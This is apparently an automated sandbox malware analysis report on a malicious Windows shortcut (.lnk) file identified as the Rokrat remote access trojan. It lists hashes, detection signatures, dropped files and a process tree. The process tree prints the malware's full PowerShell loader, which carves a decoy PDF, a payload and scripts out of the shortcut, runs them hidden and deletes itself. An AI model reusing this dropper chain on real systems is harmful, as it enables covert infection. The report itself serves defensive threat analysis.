Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07-04-2024 20:20

General

  • Target

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk

  • Size

    56.2MB

  • MD5

    358122718ba11b3e8bb56340dbe94f51

  • SHA1

    0c61effe0c06d57835ead4a574dde992515b9382

  • SHA256

    b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56

  • SHA512

    7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01

  • SSDEEP

    98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 12 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2500
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"
            4⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            PID:2396
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1376
            • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
              5⤵
              • Blocklisted process makes network request
              • Checks BIOS information in registry
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2444
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oztao2o9.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1032
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E59.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3E58.tmp"
                  7⤵
                    PID:1252
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\syxnduzy.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1464
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3EA7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3EA6.tmp"
                    7⤵
                      PID:2720
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymmdnckc.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2880
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F23.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3F22.tmp"
                      7⤵
                        PID:2856
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4n5zhp6x.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2224
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F52.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3F51.tmp"
                        7⤵
                          PID:1940

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\08C879CD.tmp

              Filesize

              53KB

              MD5

              0f1f0c4dafae0e4abaf2477996cf92fd

              SHA1

              547204864b04db1cccb0ce0b10e17a2d1ad80da0

              SHA256

              f964f0e7944d7d8603ed54f7b508d761fdf121c62dc4d77a0702327872e7058c

              SHA512

              588380cc9ff912287a2d02a279d563e365e4b360d4605bf1d2c749b9bb0f8950facda09e761931df181dd05ae88cd3e1e747715b495e5b42f4c3c9cff3dd67da

            • C:\Users\Admin\AppData\Local\Temp\4n5zhp6x.dll

              Filesize

              3KB

              MD5

              b6f0d890daff26ae762b8b21d1af6050

              SHA1

              23f0fb13527c49eadb64bd63368dd26964583653

              SHA256

              dfada9f4fdaaf7df07a668bb71b2c330a77b80ddf452b836fa9f7e59f58ab3f4

              SHA512

              b281d1602340e0fd713035d45400ac5336b58fec024cced5fd92959fcd48dadf5b9296c314771d91288ae61450bcf5d9c8a52eba76399f0f5a8ff13075d68542

            • C:\Users\Admin\AppData\Local\Temp\4n5zhp6x.pdb

              Filesize

              7KB

              MD5

              3818e125fda9c9a9cbf3abed4d779451

              SHA1

              980c38fdf39403b63b589da3bf51dbdaa54f0887

              SHA256

              1bf5cab6d278fb25d31365cdd44cbe84d5aaa4640adeea67d6bb8ebea786cbf2

              SHA512

              f282ab41ae1d65104e734f6506d18e5d74d36224dd3e3ef66a54e42a94f46ef7bd7455428881992c34556eba11b732d6e84691edb47c47cd2e08cf0a9233a856

            • C:\Users\Admin\AppData\Local\Temp\RES3E59.tmp

              Filesize

              1KB

              MD5

              568cf0430384bbcd2dd9ff84ff87b5d4

              SHA1

              5cca52c31f86ea2f73a140f5d353a93f200c1a8a

              SHA256

              a539328094079ee9c0efda75893be9b0f39ea624cf094d4dad8ad5a79bb3d6b9

              SHA512

              24c6bfb192274dc95d2e030d738d2dd4cbffd129813dc730cf552913e4a17e1af86f62a59915cbf70adce9325f170b2820e3af98ab05d8423009d702038c6f54

            • C:\Users\Admin\AppData\Local\Temp\RES3EA7.tmp

              Filesize

              1KB

              MD5

              02bf5937eadafb5d47c9b8d560236568

              SHA1

              eeb9b05af16189fb6f80dcb1f23486183e90a117

              SHA256

              997eeca361a72df584780413fab6d2bcc912b787137fd8784bb61fcf912216f7

              SHA512

              3def61cbc61db5b0b5de1903020c96e10f23daeb16e177720ec42fc315cdfd5c19c886a10006ec0a24b929e2b58899e6840ecb8f28e3b43ac1e1d32139193629

            • C:\Users\Admin\AppData\Local\Temp\RES3F23.tmp

              Filesize

              1KB

              MD5

              c47c4b3a02a887a150f35bd1df8fe4cd

              SHA1

              932a901338318c683acc03c8089dbb68e4672374

              SHA256

              b7da1c1d72b51acbceb488b27e6ec85e32ea416e1648bb85e3c00b2aec1d207e

              SHA512

              0f16b14c408c079dca2b4c6d9d2e6ca111081ee85d49d6910e4a1481afe68c92d3b23f16127197c30c30c5db80fef86e4d0692e83990567f7ff5edfb9cd7b37c

            • C:\Users\Admin\AppData\Local\Temp\RES3F52.tmp

              Filesize

              1KB

              MD5

              50c23ea3e05f0f78fc1b70ff8605fde8

              SHA1

              02ad4f92a05540e9411e7f9a63f06729ee9cfed5

              SHA256

              7bb1b0ff8b36bb7d3048a0c5c4ccfecb7bca3bf31db325f0d4c6997617f21c43

              SHA512

              2702761d42338612fabd2efffa08d1192563d5d37cabe52fba3b3b99e893397defd175290edc51b7c061121b54b993acbde9d0e4ddce388afb9cc573319eb84a

            • C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf

              Filesize

              4.7MB

              MD5

              29ec187f2ed2eca0953dca0a68ac3722

              SHA1

              a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e

              SHA256

              81269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb

              SHA512

              890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8

            • C:\Users\Admin\AppData\Local\Temp\oztao2o9.dll

              Filesize

              3KB

              MD5

              a50ba240ea9fc16337442185a009e196

              SHA1

              7b7bf855701d3ee33c71d178ab1e7395203ac24f

              SHA256

              d73b6186347775e3b34761e8776b8b2233cc31ee1a3702d8b4102b01d1ba273a

              SHA512

              c17a904a53d19d553132b5bf5895363392687434a0524abdd23e70b3ba2ae66eb0bea5270b25314f032d301c37518020f22ef873b3f1a1c4bc30393cafd3b865

            • C:\Users\Admin\AppData\Local\Temp\oztao2o9.pdb

              Filesize

              7KB

              MD5

              dfed761b764275dc0b3ac35d6d80fa2a

              SHA1

              a248c914d38bca26b7d62278395a77ec46af291a

              SHA256

              fc92b27592091bad9b8c8c46427867e5cc3c231e58812ba8b2dc0eb879bafa92

              SHA512

              2e0f937946f53098dc2c998cebd8973c3b468175a78408f48dc1ddcc0f08885fdea3ec85174e4112f9928ff99092f4441cea3478a8d0a5cad56952d389ff40d5

            • C:\Users\Admin\AppData\Local\Temp\para.dat

              Filesize

              1KB

              MD5

              655f58dcd7cd8bd996076ad4b492ae00

              SHA1

              7d69d7926de1ad560f0d002bd768eb182177cca4

              SHA256

              4e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7

              SHA512

              87575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204

            • C:\Users\Admin\AppData\Local\Temp\price.bat

              Filesize

              311B

              MD5

              f5787b3e60fad2b255ebc54d0ce747dc

              SHA1

              830705c5417f11c730cd8bbde4a2a709671cc11d

              SHA256

              a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0

              SHA512

              1e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f

            • C:\Users\Admin\AppData\Local\Temp\syxnduzy.dll

              Filesize

              3KB

              MD5

              84b20b949ad28af31ededea466362174

              SHA1

              3a30336f31d0e1562948e7b6597691b60f185631

              SHA256

              0df944aab0ab99985b39f177320c3260f6474ccc56595b5d54b05dab9754f334

              SHA512

              ac1f23f0621f66feb359556d8d1ad3208b672a394e7ab0336da428d7f9b790f538edc828c8e1508cf2d50e2d5afac16d7ccdd7447961d840236c63cb22c45790

            • C:\Users\Admin\AppData\Local\Temp\syxnduzy.pdb

              Filesize

              7KB

              MD5

              89b085172ebee1a2a788bc8113b0ee4a

              SHA1

              5190efbd6498a4fdb1a2042f58be83a6c90adb49

              SHA256

              5b9439c6ac014f77369926c0c7b56aa0c120162f9fd28aaacbc740992a9cc67b

              SHA512

              7e85369140c280bbb76238e875b367841ae634744a0de09910880b20361389ed0ebdaecf4d3b919b3835cfd3c839a2b6503bb56cedd2a8fa69b570c7dd48fb30

            • C:\Users\Admin\AppData\Local\Temp\ymmdnckc.dll

              Filesize

              3KB

              MD5

              7d55abe6a731dfe1db890ca9a1d7b5b0

              SHA1

              a83876aca50a28f64b620ed6abb6ead5b049d102

              SHA256

              adc2d1c40aada56a984d1437a14ee2f74caacc07517ed399a6ec115dd06490c9

              SHA512

              6530d2680ac2511461e9b080285c127568370e458062a0377ab17e1aa2d99ca9010d94d039e2063dbb6885076e49e54dcd5f01db0ca6e1912c86844637bf52a6

            • C:\Users\Admin\AppData\Local\Temp\ymmdnckc.pdb

              Filesize

              7KB

              MD5

              02bb18792cb0c26dff17e2e3ad77bb9a

              SHA1

              06b6c4073612e081a4f470369d85f58dd7d82415

              SHA256

              1033cd74d0f68a6f5be4606c5c1a4f0a0c24f7f2da7b7e6775c298c00761ed66

              SHA512

              ecd48f6d7f92ab3dce953bbd541ab16b2a6576491f49bd4b851e3cdf2b8f162922f19dea761d0999e6876718ecfac0fddfc1dfdf3b428aeaa0c984141abab8e4

            • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

              Filesize

              3KB

              MD5

              ac5e5c21a7ef37a33b6b83e32bd9de10

              SHA1

              d769368bc9ca82c1aa5d6d6828dad468a1bb0296

              SHA256

              caa6b0460321de6354fe6fa57e282aba58b6abbed7fce5ef1365a889d5cfffa4

              SHA512

              bf394e1a6538b79235100efe0f2a57b5ba9c1d88f06cd19d8955750e33254f2a9a32c0849fda7ef9f39d8841cbac375c9e1abf722a18a0f3cd5f0ba06d88d66f

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              8fc450735ed8e4d9afbdad80961e18ac

              SHA1

              260963629658bee83b3b662215de501cd293135d

              SHA256

              9dab287cc5f29956608055e80951431affb5251efda4cd7a1bc14aad9c8b1268

              SHA512

              b41ba4c8818da5863e99ae0809a9cd698eb4b9acd22a7b8512f0d1230f7a16df02ea7cd835b4a21741881a5f97b776b51ee8e495744128aa1bebed86278283f0

            • C:\Users\Public\panic.dat

              Filesize

              869KB

              MD5

              a043b3a2af9db6173e3a39b5c501a9bd

              SHA1

              4250f3855e53ccf755f8a05b1998f55dfa4b2c0e

              SHA256

              dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc

              SHA512

              a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5

            • \??\c:\Users\Admin\AppData\Local\Temp\4n5zhp6x.0.cs

              Filesize

              259B

              MD5

              560e1b883a997afcfa3b73d8a5cddbc1

              SHA1

              2905f3f296ac3c7d6a020fb61f0819dbea2f1569

              SHA256

              e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

              SHA512

              041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

            • \??\c:\Users\Admin\AppData\Local\Temp\4n5zhp6x.cmdline

              Filesize

              309B

              MD5

              59014dc02a19d08b7bdb1b4f7f5e024f

              SHA1

              119747b673a99eeb753dac59cc73e5798311ecca

              SHA256

              7921ea641b90e8e08d176adc1ddef17def56f5cd52cc11de3d1757877e46be0f

              SHA512

              2205e85d074b71c1165114a259988c6c3bcfb6ecd7125f639dde0bce0b08503009d5b7e31f4a602b8692faac943d87f21b0d428f6a758c93652c58de6b2d84d2

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC3E58.tmp

              Filesize

              652B

              MD5

              b83781f9e3311b5d5dcb734c66a7ce33

              SHA1

              e8eae591ceb627c9af67c76d88805186fe778e45

              SHA256

              1fabf512243e2db8f4891e8ff13929d21784ba5b89b93a9b401211b565557db5

              SHA512

              b58a10c95e955022989f137aa9fe01f259054c058e321edd083702ce7f2d79e12c16a080b2f0b99310794bda7fa47c1d2369b4aae4fd071e6740aeda413c27d4

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC3EA6.tmp

              Filesize

              652B

              MD5

              7ded09f87df697c5adc0e05c8f6e59dc

              SHA1

              92b74e668f4273398a08865493842c69173b924c

              SHA256

              ffa9540a524f4324d8d737df19374fc943e2190f41c05972987148c28c4e430b

              SHA512

              20cba042268d0d8eaf056092cab05d8d0250b0e13d9b3348d0fb43f9cd527b48aec049c61d322606e260b832ac2b5d0d05d303f1241430e4af09fca28df7e6cc

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC3F22.tmp

              Filesize

              652B

              MD5

              31306448666af11fb6e424eb4db92921

              SHA1

              913f32e0da22ddff78b989456cad3a6b57e1ebe2

              SHA256

              a4d9380080005c3b94a09f3e92c93fbb07bf46ac63eb871cb8b36a5f662eb55c

              SHA512

              f6e76d6c2f2b1847f55a24d6dbcc6b613660ccaa91ad67bd678573f0737ed0c19d5febf9059aabfd1bb9d67b74d697d70e38e655255b3d2319f06bd67222d443

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC3F51.tmp

              Filesize

              652B

              MD5

              e0fa437d8ea4111b65d5f284e7788ce9

              SHA1

              948921c5add5d6f97b7d35b58d817d721cbe058a

              SHA256

              aeb87d462762cbbab5ca685e98279840339846c0eb397f704192648bf2633e62

              SHA512

              7518ddc7b9844b0596534e6425ed2156198b8b1aca1b754552190f77fb3df0294b45c955728190741c106502755f46b8a4f469e916c7dd556a6b6f87b6ded3d7

            • \??\c:\Users\Admin\AppData\Local\Temp\oztao2o9.0.cs

              Filesize

              249B

              MD5

              69ecfeb3e9a8fb7890d114ec056ffd6d

              SHA1

              cba5334d2ffe24c60ef793a3f6a7f08067a913db

              SHA256

              0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

              SHA512

              be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

            • \??\c:\Users\Admin\AppData\Local\Temp\oztao2o9.cmdline

              Filesize

              309B

              MD5

              690b1d7a20805776350015cb9cbdf4e2

              SHA1

              80346448090f6e2a02e578723397d62febf9af93

              SHA256

              14db4e29ac5779ead92b93118495f7ecfa964a8e4911b7554b5d949fffd3ce05

              SHA512

              a4fe0d7a2124c489181b65e6b4736c98e6549d88000ba152e7dcefb14567f176f7f78a64faff552f4dafcb49e002f8959fe3a07c121ab7118083b9ac6344b805

            • \??\c:\Users\Admin\AppData\Local\Temp\syxnduzy.0.cs

              Filesize

              272B

              MD5

              4de985ae7f625fc7a2ff3ace5a46e3c6

              SHA1

              935986466ba0b620860f36bf08f08721827771cb

              SHA256

              53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

              SHA512

              067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

            • \??\c:\Users\Admin\AppData\Local\Temp\syxnduzy.cmdline

              Filesize

              309B

              MD5

              ca60f515b9026876f1b96f6cb0732952

              SHA1

              29c8ad7bc8ec0482cdc9c950d570d0bcb4d58d41

              SHA256

              d037451ebf0f6755813eaba82c536c1227e0c6b573c11670593a85391d9150cf

              SHA512

              6715abc8686030b61345cb1fb95e773f76ce099f3c9b37199df3384622d8a85a5f62badc5d4f2a0666a74c92b8f972acf0e296942df9209e10f9eeaa6aeeaeb5

            • \??\c:\Users\Admin\AppData\Local\Temp\ymmdnckc.0.cs

              Filesize

              286B

              MD5

              b23df8158ffd79f95b9bddd18738270b

              SHA1

              79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

              SHA256

              856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

              SHA512

              e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

            • \??\c:\Users\Admin\AppData\Local\Temp\ymmdnckc.cmdline

              Filesize

              309B

              MD5

              eb23adf174a53a476ae5b528614a447e

              SHA1

              ce11c6d5d31afefa42a18e4aa2f43df8de56fb25

              SHA256

              ed0bc875911f72eacad890814d81ee8dc863f1e81dcafd77e2a3dde46d2d0162

              SHA512

              d98aae4f2a705c573081793d3e5628963326856653ca9dd62adfd05d59e9f614d70feb73898def11a7800d46ce3db274b15c656217d85bfe1d3f104059b453a2

            • memory/1032-89-0x0000000000A40000-0x0000000000A80000-memory.dmp

              Filesize

              256KB

            • memory/1464-108-0x0000000002110000-0x0000000002150000-memory.dmp

              Filesize

              256KB

            • memory/2224-137-0x0000000001FD0000-0x0000000002010000-memory.dmp

              Filesize

              256KB

            • memory/2444-148-0x00000000082E0000-0x00000000083BA000-memory.dmp

              Filesize

              872KB

            • memory/2444-151-0x000000000B660000-0x000000000B743000-memory.dmp

              Filesize

              908KB

            • memory/2444-64-0x00000000029E0000-0x0000000002A20000-memory.dmp

              Filesize

              256KB

            • memory/2444-156-0x00000000029E0000-0x0000000002A20000-memory.dmp

              Filesize

              256KB

            • memory/2444-62-0x00000000029E0000-0x0000000002A20000-memory.dmp

              Filesize

              256KB

            • memory/2444-63-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2444-65-0x00000000029E0000-0x0000000002A20000-memory.dmp

              Filesize

              256KB

            • memory/2444-155-0x00000000029E0000-0x0000000002A20000-memory.dmp

              Filesize

              256KB

            • memory/2444-154-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2444-61-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2444-150-0x000000000B660000-0x000000000B743000-memory.dmp

              Filesize

              908KB

            • memory/2444-149-0x00000000082E0000-0x00000000083BA000-memory.dmp

              Filesize

              872KB

            • memory/2544-39-0x00000000029D0000-0x0000000002A10000-memory.dmp

              Filesize

              256KB

            • memory/2544-40-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2544-41-0x00000000029D0000-0x0000000002A10000-memory.dmp

              Filesize

              256KB

            • memory/2544-54-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2544-38-0x0000000073E80000-0x000000007442B000-memory.dmp

              Filesize

              5.7MB

            • memory/2880-124-0x0000000002050000-0x0000000002090000-memory.dmp

              Filesize

              256KB